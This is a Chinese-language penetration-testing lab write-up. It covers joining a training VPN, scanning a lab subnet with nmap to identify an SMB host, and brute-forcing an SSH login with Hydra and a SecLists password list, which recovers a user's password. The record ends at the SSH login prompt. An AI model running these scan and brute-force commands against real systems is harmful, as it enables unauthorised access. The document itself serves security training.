0x00 VPN 匯入
其實應該是要先openvpn cyberlab.ovpn,再下route add指令。
┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# route add -net 172.16.0.0/16 tun0
┌──(root㉿kali)-[~]
└─# cd /home/kali
┌──(root㉿kali)-[/home/kali]
└─# openvpn cyberlab.ovpn
2023-02-12 00:40:38 DEPRECATED OPTION: --cipher set to 'AES-256-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-256-CBC' to --data-ciphers or change --cipher 'AES-256-CBC' to --data-ciphers-fallback 'AES-256-CBC' to silence this warning.
2023-02-12 00:40:38 OpenVPN 2.5.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Jul 5 2022
2023-02-12 00:40:38 library versions: OpenSSL 3.0.4 21 Jun 2022, LZO 2.10
Enter Auth Username: TBMPT703
🔐 Enter Auth Password: ********
2023-02-12 00:40:58 TCP/UDP: Preserving recently used remote address: [AF_INET]122.117.124.163:443
2023-02-12 00:40:58 Socket Buffers: R=[131072->131072] S=[16384->16384]
2023-02-12 00:40:58 Attempting to establish TCP connection with [AF_INET]122.117.124.163:443 [nonblock]
2023-02-12 00:40:58 TCP connection established with [AF_INET]122.117.124.163:443
2023-02-12 00:40:58 TCP_CLIENT link local: (not bound)
2023-02-12 00:40:58 TCP_CLIENT link remote: [AF_INET]122.117.124.163:443
2023-02-12 00:40:59 TLS: Initial packet from [AF_INET]122.117.124.163:443, sid=4fc9b453 3408a057
2023-02-12 00:40:59 VERIFY OK: depth=1, O=WatchGuard_Technologies, OU=Fireware, CN=Fireware SSLVPN (SN D022036160E2D 2018-04-16 18:30:59 GMT) CA
2023-02-12 00:40:59 Validating certificate extended key usage
2023-02-12 00:40:59 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2023-02-12 00:40:59 VERIFY EKU OK
2023-02-12 00:40:59 VERIFY OK: depth=0, O=WatchGuard_Technologies, OU=Fireware, CN=Fireware SSLVPN Server
2023-02-12 00:40:59 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, peer certificate: 2048 bit RSA, signature: RSA-SHA256
2023-02-12 00:40:59 [Fireware SSLVPN Server] Peer Connection Initiated with [AF_INET]122.117.124.163:443
2023-02-12 00:41:00 SENT CONTROL [Fireware SSLVPN Server]: 'PUSH_REQUEST' (status=1)
2023-02-12 00:41:00 PUSH: Received control message: 'PUSH_REPLY,route 192.168.200.0 255.255.255.0,route 172.16.0.0 255.255.0.0,dhcp-option DOMAIN cyberlab.red,dhcp-option DNS 172.16.5.1,route-gateway 192.168.200.1,topology subnet,ping 10,ping-restart 60,ifconfig 192.168.200.13 255.255.255.0,peer-id 0'
2023-02-12 00:41:00 OPTIONS IMPORT: timers and/or timeouts modified
2023-02-12 00:41:00 OPTIONS IMPORT: --ifconfig/up options modified
2023-02-12 00:41:00 OPTIONS IMPORT: route options modified
2023-02-12 00:41:00 OPTIONS IMPORT: route-related options modified
2023-02-12 00:41:00 OPTIONS IMPORT: --ip-win32 and/or --dhcp-option options modified
2023-02-12 00:41:00 OPTIONS IMPORT: peer-id set
2023-02-12 00:41:00 OPTIONS IMPORT: adjusting link_mtu to 1626
2023-02-12 00:41:00 Using peer cipher 'AES-256-CBC'
2023-02-12 00:41:00 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2023-02-12 00:41:00 Outgoing Data Channel: Using 256 bit message hash 'SHA256' for HMAC authentication
2023-02-12 00:41:00 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2023-02-12 00:41:00 Incoming Data Channel: Using 256 bit message hash 'SHA256' for HMAC authentication
2023-02-12 00:41:00 net_route_v4_best_gw query: dst 0.0.0.0
2023-02-12 00:41:00 net_route_v4_best_gw result: via 192.168.44.2 dev eth0
2023-02-12 00:41:00 ROUTE_GATEWAY 192.168.44.2/255.255.255.0 IFACE=eth0 HWADDR=00:0c:29:dd:37:17
2023-02-12 00:41:00 TUN/TAP device tun1 opened
2023-02-12 00:41:00 net_iface_mtu_set: mtu 1500 for tun1
2023-02-12 00:41:00 net_iface_up: set tun1 up
2023-02-12 00:41:00 net_addr_v4_add: 192.168.200.13/24 dev tun1
2023-02-12 00:41:00 net_route_v4_add: 192.168.200.0/24 via 192.168.200.1 dev [NULL] table 0 metric -1
2023-02-12 00:41:00 net_route_v4_add: 172.16.0.0/16 via 192.168.200.1 dev [NULL] table 0 metric -1
2023-02-12 00:41:00 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2023-02-12 00:41:00 Initialization Sequence Completed
以上是vpn匯入方式
┌──(kali㉿kali)-[~]
└─$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:dd:37:17 brd ff:ff:ff:ff:ff:ff
inet 192.168.44.235/24 brd 192.168.44.255 scope global dynamic noprefixroute eth0
valid_lft 1229sec preferred_lft 1229sec
inet6 fe80::4db4:40fa:8293:1d0b/64 scope link noprefixroute
valid_lft forever preferred_lft forever
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.200.12/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::4af0:9003:609f:1f74/64 scope link stable-privacy
valid_lft forever preferred_lft forever
5: tun1: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.200.13/24 scope global tun1
valid_lft forever preferred_lft forever
inet6 fe80::2a9d:3ae4:df95:5272/64 scope link stable-privacy
valid_lft forever preferred_lft forever
測試是否連上VPN:
如果以上方法不管用,使用另外一個連接VPN的方式--用windows。從網站上下載ovpn副檔名後,下載openvpn的windows版並匯入。之後應該會出現:
接下來就可以直接用windows的遠端桌面,連到172.16.253.xx,xx是一個不超過22的數字,是kali環境。
0x01 NMAP練習
接下來才能做以下題目:
這裡做第二題(在剛剛連到的172.16網段上的kali),首先就是照上面的指令打。只是,windows電腦名稱的話,只要掃445 port就好。
┌──(kali㉿kali)-[~]
└─$ nmap 172.16.1-20.* -sC -sV -p445
Starting Nmap 7.91 ( https://nmap.org ) at 2023-02-12 02:06 EST
Stats: 0:02:04 elapsed; 4079 hosts completed (17 up), 1024 undergoing Ping Scan
Ping Scan Timing: About 100.00% done; ETC: 02:08 (0:00:00 remaining)
Stats: 0:02:05 elapsed; 4079 hosts completed (17 up), 1024 undergoing Ping Scan
Parallel DNS resolution of 5 hosts. Timing: About 0.00% done
Stats: 0:02:05 elapsed; 4079 hosts completed (17 up), 1024 undergoing Ping Scan
Parallel DNS resolution of 5 hosts. Timing: About 0.00% done
Nmap scan report for 172.16.1.51
Host is up (0.0019s latency).
PORT STATE SERVICE VERSION
445/tcp filtered microsoft-ds
Nmap scan report for 172.16.1.67
Host is up (0.0017s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Nmap scan report for 172.16.1.87
Host is up (0.0021s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: SEH-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h39m27s, deviation: 4h37m02s, median: 29s
|_nbstat: NetBIOS name: SEH-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:01:36:f7 (Microsoft)
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: SEH-PC
| NetBIOS computer name: SEH-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-02-12T15:09:44+08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-12T07:09:44
|_ start_date: 2023-02-12T04:01:40
Nmap scan report for 172.16.1.105
Host is up (0.0031s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 30s, deviation: 0s, median: 29s
|_nbstat: NetBIOS name: WIN-FH0N2VGINDJ, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:2d:e7:92 (Microsoft)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-12T07:09:36
|_ start_date: 2021-05-28T17:04:49
Nmap scan report for 172.16.1.112
Host is up (0.0041s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 30s, deviation: 0s, median: 30s
|_nbstat: NetBIOS name: ZACH, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:01:36:37 (Microsoft)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-12T07:09:45
|_ start_date: 2022-10-15T07:48:25
Nmap scan report for 172.16.1.120
Host is up (0.0100s latency).
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: FULECMS
Host script results:
|_clock-skew: mean: -2h39m28s, deviation: 4h37m05s, median: 29s
|_nbstat: NetBIOS name: FULECMS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: fulecms
| NetBIOS computer name: FULECMS\x00
| Domain name: \x00
| FQDN: fulecms
|_ System time: 2023-02-12T15:09:39+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-12T07:09:44
|_ start_date: N/A
Nmap scan report for www.LuxuryTreats.com (172.16.1.130)
Host is up (0.0018s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 28s, deviation: 0s, median: 27s
|_nbstat: NetBIOS name: WINSERVER2012, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:01:36:2d (Microsoft)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-12T07:09:42
|_ start_date: 2022-10-20T18:10:24
Nmap scan report for 172.16.1.134
Host is up (0.0038s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Nmap scan report for 172.16.1.153
Host is up (0.0040s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Nmap scan report for 172.16.1.157
Host is up (0.0020s latency).
PORT STATE SERVICE VERSION
445/tcp filtered microsoft-ds
Nmap scan report for 172.16.1.191
Host is up (0.0015s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h39m27s, deviation: 4h37m04s, median: 30s
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: WinPower
| NetBIOS computer name: WINPOWER\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-02-12T15:09:42+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-12T07:09:38
|_ start_date: 2023-02-12T04:01:52
Nmap scan report for 172.16.1.222
Host is up (0.0018s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Nmap scan report for 172.16.3.124
Host is up (0.0028s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows Server 2016 Essentials 14393 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: WIN-56MI46O6T68; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h39m27s, deviation: 4h37m05s, median: 30s
|_nbstat: NetBIOS name: WIN-56MI46O6T68, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:92:88:77 (Microsoft)
| smb-os-discovery:
| OS: Windows Server 2016 Essentials 14393 (Windows Server 2016 Essentials 6.3)
| Computer name: WIN-56MI46O6T68
| NetBIOS computer name: WIN-56MI46O6T68\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-02-12T15:09:40+08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-12T07:09:38
|_ start_date: 2022-11-01T06:49:25
Nmap scan report for 172.16.3.125
Host is up (0.0049s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Nmap scan report for 172.16.3.126
Host is up (0.0031s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Nmap scan report for 172.16.3.128
Host is up (0.0012s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Nmap scan report for 172.16.5.1
Host is up (0.00062s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
Host script results:
|_clock-skew: 29s
|_nbstat: NetBIOS name: DASHBOARD, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:92:88:08 (Microsoft)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-12T07:09:45
|_ start_date: N/A
Nmap scan report for 172.16.19.2
Host is up (0.0026s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: IRMA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h39m25s, deviation: 4h37m01s, median: 30s
|_nbstat: NetBIOS name: IRMA, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:2d:e7:b6 (Microsoft)
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: IRMA
| NetBIOS computer name: IRMA\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-02-12T15:09:46+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-12T07:09:46
|_ start_date: 2021-05-22T09:26:30
Nmap scan report for 172.16.19.9
Host is up (0.0069s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 30s, deviation: 0s, median: 30s
|_nbstat: NetBIOS name: FRANKLIN, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:01:36:f5 (Microsoft)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-12T07:09:45
|_ start_date: 2023-02-12T04:01:46
Nmap scan report for 172.16.20.3
Host is up (0.0083s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Nmap scan report for 172.16.20.6
Host is up (0.0043s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Nmap scan report for 172.16.20.7
Host is up (0.0041s latency).
PORT STATE SERVICE VERSION
445/tcp closed microsoft-ds
Post-scan script results:
| clock-skew:
| -2h39m27s:
| 172.16.1.191
| 172.16.19.9
| 172.16.19.2
| 172.16.3.124
|_ 172.16.1.112
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 5120 IP addresses (22 hosts up) scanned in 184.10 seconds
可以知道是172.16.19.2,從NetBIOS computer name看出。
0x02 應用Hydra之ssh密碼爆破
接下來是下一題:
起手式,就是先nmap:
┌──(kali㉿kali)-[~]
└─$ sudo nmap 172.16.3.128
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-12 02:40 EST
Nmap scan report for 172.16.3.128
Host is up (0.0074s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 5.03 seconds
確定開啟的port後,再針對這些port做詳細的掃描:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -A 172.16.3.128 -p 22 1 ⨯
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2023-02-12 02:36 EST
Nmap scan report for 172.16.3.128
Host is up (0.0013s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 ce:8e:b1:74:09:f0:e9:ac:52:08:10:f2:d8:2e:b6:e0 (DSA)
| 2048 a2:c1:d9:a1:e1:f7:30:2e:ae:85:cb:05:0c:35:59:ed (RSA)
| 256 0d:86:58:bb:fb:1c:32:2e:0d:70:f9:5c:f1:e1:3e:ca (ECDSA)
|_ 256 b6:e0:4f:fd:17:be:8f:89:1d:a2:9a:0c:fe:45:a3:ef (ED25519)
MAC Address: 00:15:5D:92:88:5C (Microsoft)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.34 ms 172.16.3.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.27 seconds
但是上面第一個指令沒加任何參數,只會掃最常見的1000個port,如果要掃全部port,可以打以下指令:
┌──(kali㉿kali)-[~]
└─$ sudo nmap 172.16.3.128 -p 1-65535
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-19 01:17 EST
Nmap scan report for 172.16.3.128
Host is up (0.043s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 49.72 seconds
確定真的只有開22 port,所以接下來只要猜ssh的密碼即可。這裡先安裝猜密碼要用的檔案:
┌──(kali㉿kali)-[~]
└─$ sudo apt --fix-broken install seclists
[sudo] password for kali:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
catfish freeglut3 gir1.2-xfconf-0 libatk1.0-data libcfitsio9 libclang-cpp11
libev4 libexporter-tiny-perl libflac8 libfmt8 libgdal31 libgeos3.11.0
libgs9-common libgssdp-1.2-0 libgupnp-1.2-1 libhttp-server-simple-perl
libilmbase25 liblerc3 liblist-moreutils-perl liblist-moreutils-xs-perl
libllvm11 libnginx-mod-http-geoip libnginx-mod-http-image-filter
libnginx-mod-http-xslt-filter libnginx-mod-mail libnginx-mod-stream
libnginx-mod-stream-geoip libopenexr25 libopenh264-6 libperl5.34
libplacebo192 libpoppler118 libprotobuf23 libpython3.10 libpython3.10-dev
libpython3.10-minimal libpython3.10-stdlib libpython3.9-minimal
libpython3.9-stdlib libsvtav1enc0 libtbb12 libtbbbind-2-5 libtbbmalloc2
libtiff5 libwebsockets16 libwireshark15 libwiretap12 libwsutil13
libzxingcore1 llvm-11 llvm-11-dev llvm-11-linker-tools llvm-11-runtime
llvm-11-tools nginx-common nginx-core openjdk-11-jre perl-modules-5.34
python-pastedeploy-tpl python3-commonmark python3-dataclasses-json
python3-limiter python3-marshmallow-enum python3-mypy-extensions
python3-ntlm-auth python3-requests-ntlm python3-responses python3-speaklater
python3-spyse python3-token-bucket python3-typing-inspect python3.10
python3.10-dev python3.10-minimal python3.9 python3.9-minimal ruby3.0
ruby3.0-dev ruby3.0-doc
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
seclists
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 405 MB of archives.
After this operation, 1,627 MB of additional disk space will be used.
Get:1 http://kali.cs.nctu.edu.tw/kali kali-rolling/main amd64 seclists all 2022.4-0kali1 [405 MB]
Fetched 405 MB in 30s (13.7 MB/s)
Selecting previously unselected package seclists.
(Reading database ... 394243 files and directories currently installed.)
Preparing to unpack .../seclists_2022.4-0kali1_all.deb ...
Unpacking seclists (2022.4-0kali1) ...
Setting up seclists (2022.4-0kali1) ...
Processing triggers for kali-menu (2022.4.1) ...
Processing triggers for wordlists (2023.1.2) ...
┌──(kali㉿kali)-[~]
└─$ cd /usr/share/seclists
安裝完成到安裝目錄看一下:
┌──(kali㉿kali)-[~]
└─$ cd /usr/share/seclists
┌──(kali㉿kali)-[/usr/share/seclists]
└─$ ls -al
total 56
drwxr-xr-x 11 root root 4096 Feb 19 02:20 .
drwxr-xr-x 342 root root 12288 Feb 19 02:19 ..
drwxr-xr-x 9 root root 4096 Feb 19 02:19 Discovery
drwxr-xr-x 9 root root 4096 Feb 19 02:20 Fuzzing
drwxr-xr-x 2 root root 4096 Feb 19 02:20 IOCs
drwxr-xr-x 7 root root 4096 Feb 19 02:20 Miscellaneous
drwxr-xr-x 12 root root 4096 Feb 19 02:20 Passwords
drwxr-xr-x 3 root root 4096 Feb 19 02:20 Pattern-Matching
drwxr-xr-x 8 root root 4096 Feb 19 02:20 Payloads
-rw-r--r-- 1 root root 2101 Nov 22 07:56 README.md
drwxr-xr-x 4 root root 4096 Feb 19 02:20 Usernames
drwxr-xr-x 10 root root 4096 Feb 19 02:20 Web-Shells
┌──(kali㉿kali)-[/usr/share/seclists]
└─$ cd Passwords
┌──(kali㉿kali)-[/usr/share/seclists/Passwords]
└─$ ls -al
total 258600
drwxr-xr-x 12 root root 4096 Feb 19 02:20 .
drwxr-xr-x 11 root root 4096 Feb 19 02:20 ..
-rw-r--r-- 1 root root 1594 Nov 22 07:56 2020-200_most_used_passwords.txt
-rw-r--r-- 1 root root 3491 Nov 22 07:56 500-worst-passwords.txt
-rw-r--r-- 1 root root 1868 Nov 22 07:56 500-worst-passwords.txt.bz2
drwxr-xr-x 2 root root 4096 Feb 19 02:20 BiblePass
-rw-r--r-- 1 root root 15663259 Nov 22 07:56 bt4-password.txt
-rw-r--r-- 1 root root 7841 Nov 22 07:56 cirt-default-passwords.txt
-rw-r--r-- 1 root root 26 Nov 22 07:56 citrix.txt
-rw-r--r-- 1 root root 611 Nov 22 07:56 clarkson-university-82.txt
drwxr-xr-x 2 root root 4096 Feb 19 02:20 Common-Credentials
drwxr-xr-x 2 root root 4096 Feb 19 02:20 Cracked-Hashes
-rw-r--r-- 1 root root 15069474 Nov 22 07:56 darkc0de.txt
-rw-r--r-- 1 root root 82603 Nov 22 07:56 darkweb2017-top10000.txt
-rw-r--r-- 1 root root 8160 Nov 22 07:56 darkweb2017-top1000.txt
-rw-r--r-- 1 root root 802 Nov 22 07:56 darkweb2017-top100.txt
-rw-r--r-- 1 root root 81 Nov 22 07:56 darkweb2017-top10.txt
-rw-r--r-- 1 root root 71176 Nov 22 07:56 days.txt
drwxr-xr-x 2 root root 4096 Feb 19 02:20 Default-Credentials
-rw-r--r-- 1 root root 13 Nov 22 07:56 der-postillon.txt
-rw-r--r-- 1 root root 73216276 Nov 22 07:56 dutch_common_wordlist.txt
-rw-r--r-- 1 root root 43164090 Nov 22 07:56 dutch_passwordlist.txt
-rw-r--r-- 1 root root 6729365 Nov 22 07:56 dutch_wordlist
-rw-r--r-- 1 root root 3205 Nov 22 07:56 german_misc.txt
drwxr-xr-x 2 root root 4096 Feb 19 02:20 Honeypot-Captures
-rw-r--r-- 1 root root 84476 Nov 22 07:56 Keyboard-Combinations.txt
drwxr-xr-x 2 root root 4096 Feb 19 02:20 Leaked-Databases
drwxr-xr-x 2 root root 4096 Feb 19 02:20 Malware
-rw-r--r-- 1 root root 153850 Nov 22 07:56 months.txt
-rw-r--r-- 1 root root 322069 Nov 22 07:56 Most-Popular-Letter-Passes.txt
-rw-r--r-- 1 root root 1453892 Nov 22 07:56 mssql-passwords-nansh0u-guardicore.txt
-rw-r--r-- 1 root root 40999980 Nov 22 07:56 openwall.net-all.txt
drwxr-xr-x 2 root root 4096 Feb 19 02:20 Permutations
-rw-r--r-- 1 root root 242 Nov 22 07:56 PHP-Magic-Hashes.txt
-rw-r--r-- 1 root root 100206 Nov 22 07:56 probable-v2-top12000.txt
-rw-r--r-- 1 root root 12261 Nov 22 07:56 probable-v2-top1575.txt
-rw-r--r-- 1 root root 1620 Nov 22 07:56 probable-v2-top207.txt
-rw-r--r-- 1 root root 848 Nov 22 07:56 README.md
-rw-r--r-- 1 root root 154919 Nov 22 07:56 richelieu-french-top20000.txt
-rw-r--r-- 1 root root 38268 Nov 22 07:56 richelieu-french-top5000.txt
-rw-r--r-- 1 root root 3150405 Nov 22 07:56 SCRABBLE-hackerhouse.tgz
-rw-r--r-- 1 root root 113166 Nov 22 07:56 scraped-JWT-secrets.txt
-rw-r--r-- 1 root root 56721 Nov 22 07:56 seasons.txt
drwxr-xr-x 2 root root 4096 Feb 19 02:20 Software
-rw-r--r-- 1 root root 18 Nov 22 07:56 stupid-ones-in-production.txt
-rw-r--r-- 1 root root 3023 Nov 22 07:56 twitter-banned.txt
-rw-r--r-- 1 root root 31312 Nov 22 07:56 unkown-azul.txt
-rw-r--r-- 1 root root 5229 Nov 22 07:56 UserPassCombo-Jay.txt
drwxr-xr-x 2 root root 4096 Feb 19 02:20 WiFi-WPA
-rw-r--r-- 1 root root 8557632 Nov 22 07:56 xato-net-10-million-passwords-1000000.txt
-rw-r--r-- 1 root root 781879 Nov 22 07:56 xato-net-10-million-passwords-100000.txt
-rw-r--r-- 1 root root 76497 Nov 22 07:56 xato-net-10-million-passwords-10000.txt
-rw-r--r-- 1 root root 7399 Nov 22 07:56 xato-net-10-million-passwords-1000.txt
-rw-r--r-- 1 root root 738 Nov 22 07:56 xato-net-10-million-passwords-100.txt
-rw-r--r-- 1 root root 75 Nov 22 07:56 xato-net-10-million-passwords-10.txt
-rw-r--r-- 1 root root 6212177 Nov 22 07:56 xato-net-10-million-passwords-dup.txt
-rw-r--r-- 1 root root 48312893 Nov 22 07:56 xato-net-10-million-passwords.txt
可以看到Passwords裡有許多文件,應該是叫字典檔,挑其中一個1000000筆的,比較大,接下來就是用hydra爆破ssh密碼:
┌──(kali㉿kali)-[/usr/share/seclists/Passwords]
└─$ hydra -l jason -P xato-net-10-million-passwords-1000000.txt ssh://172.16.3.128
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-19 02:43:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking ssh://172.16.3.128:22/
[STATUS] 86.00 tries/min, 86 tries in 00:01h, 999916 to do in 193:47h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 999706 to do in 168:53h, 14 active
[ERROR] Can not create restore file (./hydra.restore) - Permission denied
[22][ssh] host: 172.16.3.128 login: jason password: apollo
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
[ERROR] 8 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-19 02:48:57
小寫l是特定帳號,大寫L是載入帳號的字典檔;小寫p是特定密碼,大寫P是載入密碼的字典檔。可以得知密碼是apollo,接下來利用這帳密登入:
┌──(kali㉿kali)-[/usr/share/seclists/Passwords]
└─$ ssh jason@172.16.3.128
jason@172.16.3.128's password:
